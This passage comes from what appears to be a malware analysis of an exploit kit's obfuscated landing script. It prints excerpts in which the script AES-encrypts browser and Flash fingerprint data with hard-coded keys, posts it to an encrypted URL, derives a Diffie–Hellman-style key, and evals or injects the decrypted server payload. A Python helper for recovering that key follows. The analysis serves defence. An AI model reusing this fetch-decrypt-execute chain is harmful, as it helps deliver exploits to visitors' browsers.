The previous data to be encrypted looks like this.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"lIlII11"</span><span class="p">:</span><span class="s2">"c81e728d9d4c2f636f067f89cc14862c"</span><span class="p">,</span><span class="w"> </span><span class="nl">"lll1II"</span><span class="p">:</span><span class="s2">"a87ff679a2f3e71d9181a67b7542122c"</span><span class="p">,</span><span class="w"> </span><span class="nl">"l11IlIl"</span><span class="p">:</span><span class="s2">"3f05415ebff145466040f6a73dca8704"</span><span class="p">,</span><span class="w"> </span><span class="nl">"lI1lIl1Ill"</span><span class="p">:</span><span class="s2">"c4ca4238a0b923820dcc509a6f75849b"</span><span class="p">,</span><span class="w"> </span><span class="nl">"II1l1IlI"</span><span class="p">:</span><span class="s2">"false@@false@@true@@false"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>The data actually sent is encrypted in this way.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV </code></pre></div></div> <p>Let’s look at the process after sending. <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called. Here, two AES decodings are performed. 
Let’s first look at the first decoding process.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// aes_decrypt(enc_data, key, iv)</span> <span class="kd">var</span> <span class="nx">lIlIl1IIl11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">Il1I11l</span><span class="p">[</span><span class="dl">'</span><span class="s1">responseText</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">III1l1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// key</span> <span class="p">{</span> <span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1ll11I</span><span class="dl">'</span><span class="p">]</span> <span class="p">}</span> <span class="c1">// iv</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">Il11I1II</span><span class="dl">'</span><span class="p">]);</span> <span class="kd">var</span> <span class="nx">l1I1l1</span> <span class="o">=</span> <span 
class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIl11</span><span class="dl">'</span><span class="p">](</span><span class="nx">lIlIl1IIl11</span><span class="p">);</span> </code></pre></div></div> <p>The POST response data is also AES-encrypted. The key and IV are the same as before, namely the values hard-coded in the JavaScript (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>). Decrypting yields JSON, so the result is then parsed as JSON. The decoded JSON data looks like this.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"IlI1l"</span><span class="p">:</span><span class="s2">"9b412e5c651d73fd1e271dd63f6901a0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"I1111"</span><span class="p">:</span><span class="s2">"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3</span><span class="se">\/</span><span class="s2">pL…"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>The second value is decrypted using the first, a 32-character hexadecimal string. The first value is called str_F. 
Also, decoding is done with AES, but the key and IV are different from before.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">lIlll1IIlI</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nx">l1I1l1</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlll1IIlI</span><span class="dl">'</span><span class="p">],</span> <span class="mi">16</span><span class="p">);</span> <span class="c1">// str_F</span> <span class="c1">// key (str_G) =&gt; str_F.modPow(str_C, str_D)</span> <span class="kd">var</span> <span class="nx">llIIlI</span> <span class="o">=</span> <span class="nx">lIlll1IIlI</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll11IIl</span><span class="dl">'</span><span class="p">](</span><span class="nx">ll1l1IlIIIll</span><span class="p">,</span> <span class="nx">lll1II</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">I1Il1I1</span> <span class="o">=</span> <span class="nx">llIIlI</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">IIIIlI1IllII</span> <span class="o">=</span> <span class="mi">32</span> <span class="o">-</span> <span class="nx">I1Il1I1</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="nx">IIIIlI1IllII</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="nx">I1Il1I1</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">0</span><span 
class="dl">'</span> <span class="o">+</span> <span class="nx">I1Il1I1</span><span class="p">;</span> <span class="nx">IIIIlI1IllII</span><span class="o">--</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">II1ll</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1lI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">ll1llI1</span><span class="dl">'</span><span class="p">](</span><span class="nx">I1Il1I1</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">lI1lIl1Ill</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1lI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">ll1llI1</span><span class="dl">'</span><span class="p">](</span><span class="nx">l1ll1</span><span class="p">);</span> <span class="c1">// aes_decrypt(enc_data, key, iv)</span> <span class="kd">var</span> <span class="nx">Il11lII1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span 
class="nx">l1I1l1</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIl1IIl11</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data</span> <span class="nx">II1ll</span><span class="p">,</span> <span class="c1">// str_G</span> <span class="p">{</span> <span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nx">lI1lIl1Ill</span> <span class="p">}</span> <span class="c1">// iv =&gt; str_A</span> <span class="p">);</span> </code></pre></div></div> <p>The value computed from str_F, str_C and str_D is called str_G. Thus str_C is required to decrypt the data, but str_C has never been sent to the server. In the captured traffic you can see str_E and str_G, both created from str_C, but str_C itself cannot be recovered from them. See Wikipedia for details.</p> <ul> <li><a href="https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange">Diffie–Hellman key exchange - Wikipedia</a></li> </ul> <p>The data thus decrypted is executed as JavaScript.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// eval</span> <span class="nx">II1Il</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll1I1</span><span class="dl">'</span><span class="p">]();</span> </code></pre></div></div> <p>Let’s look at the executed code. First, the URL used next is decoded. 
The key and IV used for this URL decode are the hard-coded initial values.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// aes_decrypt(enc_url, key, iv)</span> <span class="kd">var</span> <span class="nx">l11l1I1</span> <span class="o">=</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">lI11lIl</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">l11II11l</span><span class="dl">"</span><span class="p">](</span> <span class="dl">"</span><span class="s2">l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=</span><span class="dl">"</span><span class="p">,</span> <span class="nx">III1l1</span><span class="p">,</span> <span class="p">{</span> <span class="na">lI1lIl1Ill</span><span class="p">:</span><span class="nx">II1ll11I</span> <span class="p">}</span> <span class="p">)[</span><span class="dl">"</span><span class="s2">lIlIlll11l</span><span class="dl">"</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">IIIlI</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">Il11I1II</span><span class="dl">"</span><span class="p">]);</span> </code></pre></div></div> <p>Then, as before, the function is called. Let’s look at it. First, the data needed for encryption and decryption is defined as before. 
Give each one a name as before.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// str_A2</span> <span class="kd">var</span> <span class="nx">l1ll1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">]();</span> <span class="c1">// str_B2</span> <span class="kd">var</span> <span class="nx">lIlII11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_C2</span> <span class="kd">var</span> <span class="nx">ll1l1IlIIIll</span> <span 
class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_D2</span> <span class="kd">var</span> <span class="nx">lll1II</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_E2 =&gt; str_B2.powMod(str_C2, str_D2)</span> <span class="kd">var</span> <span class="nx">l11IlIl</span> 
<span class="o">=</span> <span class="nx">lIlII11</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll11IIl</span><span class="dl">'</span><span class="p">](</span><span class="nx">ll1l1IlIIIll</span><span class="p">,</span><span class="nx">lll1II</span><span class="p">);</span> </code></pre></div></div> <p>Next, prepare the data to send as a POST request. Unlike before, Adobe Flash Player version information is also sent.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">l11IlIIlllll</span> <span class="o">=</span> <span class="p">{};</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlII11</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">lIlII11</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_B2</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lll1II</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">lll1II</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_D2</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">l11IlIl</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">l11IlIl</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_E2</span> <span 
class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lI1lIl1Ill</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">l1ll1</span><span class="p">;</span> <span class="c1">// str_A2</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1l1IlI</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">@@</span><span class="dl">'</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1l1IlI</span><span class="dl">'</span><span class="p">]();</span> <span class="c1">// browser check data</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l111I</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l111I</span><span class="dl">'</span><span class="p">];</span> <span class="c1">// Adobe Flash Player version check data</span> </code></pre></div></div> <p>The sending process is the same as the previous one. 
The key and IV used in this case are also initial values.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">I1l1I1</span><span class="dl">'</span><span class="p">](</span><span class="nx">Il1I11l</span><span class="p">,</span><span class="dl">"</span><span class="s2">post</span><span class="dl">"</span><span class="p">,</span><span class="nx">l11l1I1</span><span class="p">,</span><span class="kc">true</span><span class="p">);</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1lllIIlI</span><span class="dl">'</span><span class="p">](</span> <span class="nx">Il1I11l</span><span class="p">,</span> <span class="c1">// aes_encrypt</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">Ill1lI1Ill</span><span class="dl">'</span><span class="p">](</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">IIII1Il</span><span class="dl">'</span><span class="p">](</span><span class="nx">l11IlIIlllll</span><span class="p">),</span> <span class="c1">// POST Data</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">III1l1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// key</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1ll11I</span><span class="dl">'</span><span class="p">]}</span> <span class="c1">// iv</span> <span class="p">)[</span><span 
class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">]()</span> <span class="p">);</span> </code></pre></div></div> <p>Thus, <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called as well. Here too, the decoding process is performed as before. First, decode POST response data with the same key and IV as before.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// aes_decrypt(enc_data, key, iv)</span> <span class="kd">var</span> <span class="nx">lIlIl1IIl11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">Il1I11l</span><span class="p">[</span><span class="dl">'</span><span class="s1">responseText</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">III1l1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// key</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1ll11I</span><span class="dl">'</span><span class="p">]}</span> <span class="c1">// iv</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span 
class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">Il11I1II</span><span class="dl">'</span><span class="p">]);</span> </code></pre></div></div> <p>Parsing the decoded result as JSON shows that it contains three values, like this. The first, a 32-character hexadecimal string, is called str_F2.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"lIlll1IIlI"</span><span class="p">:</span><span class="w"> </span><span class="s2">"87e087b48d4b06215f486021f23f5470"</span><span class="p">,</span><span class="w"> </span><span class="nl">"lIIIIllIl1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W</span><span class="se">\/</span><span class="s2">vw87Vd9RtdXhps9ZppZc</span><span class="se">\/</span><span class="s2">INO01Bqk79BOMS9ykHCDPE</span><span class="se">\/\/</span><span class="s2">kWCHQuuh0</span><span class="se">\/</span><span class="s2">rr…"</span><span class="p">,</span><span class="w"> </span><span class="nl">"II11lIl11"</span><span class="p">:</span><span class="w"> </span><span class="s2">"88HY4nkc9TWmnRPi</span><span class="se">\/</span><span class="s2">hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>Next, decrypt this data. 
Two values are decoded as a result.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">lIlll1IIlI</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nx">l1I1l1</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlll1IIlI</span><span class="dl">'</span><span class="p">],</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_G2 =&gt; str_F2.modPow(str_C2, str_D2)</span> <span class="kd">var</span> <span class="nx">llIIlI</span> <span class="o">=</span> <span class="nx">lIlll1IIlI</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll11IIl</span><span class="dl">'</span><span class="p">](</span><span class="nx">ll1l1IlIIIll</span><span class="p">,</span><span class="nx">lll1II</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">I1Il1I1</span> <span class="o">=</span> <span class="nx">llIIlI</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">IIIIlI1IllII</span> <span class="o">=</span> <span class="mi">32</span> <span class="o">-</span> <span class="nx">I1Il1I1</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="k">while</span><span class="p">(</span><span class="nx">IIIIlI1IllII</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="nx">I1Il1I1</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">0</span><span class="dl">'</span><span class="o">+</span><span class="nx">I1Il1I1</span><span class="p">;</span> <span 
class="nx">IIIIlI1IllII</span><span class="o">--</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">II1ll</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1lI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">ll1llI1</span><span class="dl">'</span><span class="p">](</span><span class="nx">I1Il1I1</span><span class="p">);</span> <span class="c1">// str_G2</span> <span class="kd">var</span> <span class="nx">lI1lIl1Ill</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1lI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">ll1llI1</span><span class="dl">'</span><span class="p">](</span><span class="nx">l1ll1</span><span class="p">);</span> <span class="c1">// str_A2</span> <span class="c1">// aes_decrypt()</span> <span class="kd">var</span> <span class="nx">I1II111I1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">l1I1l1</span><span class="p">[</span><span 
class="dl">'</span><span class="s1">lIIIIllIl1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data_1</span> <span class="nx">II1ll</span><span class="p">,</span> <span class="c1">// str_G2</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nx">lI1lIl1Ill</span><span class="p">}</span> <span class="c1">// str_A2</span> <span class="p">);</span> <span class="kd">var</span> <span class="nx">IIIIl</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">l1I1l1</span><span class="p">[</span><span class="dl">'</span><span class="s1">II11lIl11</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data_2</span> <span class="nx">II1ll</span><span class="p">,</span> <span class="c1">// str_G2</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nx">lI1lIl1Ill</span><span class="p">}</span> <span class="c1">// str_A2</span> <span class="p">);</span> </code></pre></div></div> <p>The data thus decoded is written to Body and executed. 
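<p>As an added example (not code from this post or from the exploit kit), the key-derivation step above reimplemented in Python from an analyst's point of view: given the server's str_F2 from the decrypted response and the client-side values str_C2 and str_D2 introduced earlier in the post, it reproduces str_G2 exactly as the script does (modPow, then left-pad the hex string to 32 characters) and splits the response into its three fields. The library behind <code>Il1IIllIlI1I</code> is assumed here to be CryptoJS, so <code>Hex.parse</code> of the 32-character string yields a 16-byte AES-128 key and str_A2 a 16-byte IV; the AES-CBC decryption itself needs a crypto library and is left out. The numeric values of str_C2, str_D2 and str_A2 and the two ciphertext placeholders in the sample are constructed, not taken from captured traffic.</p>

```python
import json

# Obfuscated field names of the decrypted response, as they appear in the post.
FIELD_STR_F2 = "lIlll1IIlI"
FIELD_ENC_DATA_1 = "lIIIIllIl1"
FIELD_ENC_DATA_2 = "II11lIl11"


def derive_str_g2(str_f2_hex: str, str_c2: int, str_d2: int) -> str:
    """str_G2 = str_F2.modPow(str_C2, str_D2), rendered as hex.

    The script prepends '0' while the length is below 32 but never truncates,
    so a result wider than 128 bits is returned as-is.
    """
    g2 = pow(int(str_f2_hex, 16), str_c2, str_d2)
    return format(g2, "x").rjust(32, "0")


def parse_response(decrypted_json: str):
    """Split the decrypted POST response into (str_F2, enc_data_1, enc_data_2)."""
    obj = json.loads(decrypted_json)
    return obj[FIELD_STR_F2], obj[FIELD_ENC_DATA_1], obj[FIELD_ENC_DATA_2]


def key_and_iv(str_g2_hex: str, str_a2_hex: str):
    """What CryptoJS Hex.parse produces for the key (str_G2) and IV (str_A2).

    Assumption: the obfuscated library is CryptoJS. Both values must be 16
    bytes for AES-128-CBC, which is why the script pads str_G2 to 32 digits.
    """
    key, iv = bytes.fromhex(str_g2_hex), bytes.fromhex(str_a2_hex)
    if len(key) != 16 or len(iv) != 16:
        raise ValueError("key/IV are not 128-bit; derivation or capture is off")
    return key, iv


# Constructed sample: str_F2 is the value shown in the post, the two
# ciphertext fields are placeholders standing in for the truncated base64.
SAMPLE_RESPONSE = json.dumps({
    FIELD_STR_F2: "87e087b48d4b06215f486021f23f5470",
    FIELD_ENC_DATA_1: "AAAAAAAAAAAAAAAAAAAAAA==",
    FIELD_ENC_DATA_2: "BBBBBBBBBBBBBBBBBBBBBB==",
})
# Constructed client-side parameters (the real ones come from the earlier
# exchange in the post): a 127-bit prime modulus, a random exponent, and the
# client-chosen IV str_A2.
SAMPLE_STR_D2 = 2**127 - 1
SAMPLE_STR_C2 = 0x2F0D61C4A9B35E7718DAC0F30E5B9A41
SAMPLE_STR_A2 = "000102030405060708090a0b0c0d0e0f"


def recover_key_material(decrypted_json=SAMPLE_RESPONSE,
                         str_c2=SAMPLE_STR_C2, str_d2=SAMPLE_STR_D2,
                         str_a2_hex=SAMPLE_STR_A2):
    """End-to-end: response -> str_G2 -> (key, iv), plus the two ciphertexts."""
    str_f2, enc1, enc2 = parse_response(decrypted_json)
    str_g2 = derive_str_g2(str_f2, str_c2, str_d2)
    key, iv = key_and_iv(str_g2, str_a2_hex)
    return {"str_G2": str_g2, "key": key, "iv": iv,
            "enc_data_1": enc1, "enc_data_2": enc2}


if __name__ == "__main__":
    material = recover_key_material()
    print("str_G2 =", material["str_G2"])
    print("key    =", material["key"].hex(), "iv =", material["iv"].hex())
```

<p>With real values, <code>recover_key_material</code> is fed the str_C2 and str_D2 recorded from the first exchange and the decrypted second response; the returned key and IV are then passed to any AES-128-CBC implementation to obtain the two payloads.</p>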
